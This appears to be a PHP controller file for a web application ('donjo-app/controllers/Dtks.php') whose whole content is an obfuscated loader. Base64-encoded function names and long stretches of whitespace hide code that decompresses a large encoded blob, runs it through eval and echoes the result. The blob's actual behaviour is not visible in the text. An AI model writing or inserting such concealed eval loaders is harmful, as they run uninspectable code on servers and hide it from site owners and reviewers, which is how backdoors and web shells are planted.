<?php 
        $__='printf';$_='Loading donjo-app/controllers/Dtks.php';
        



























































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































                                                                                                                                                                                                                     $________;
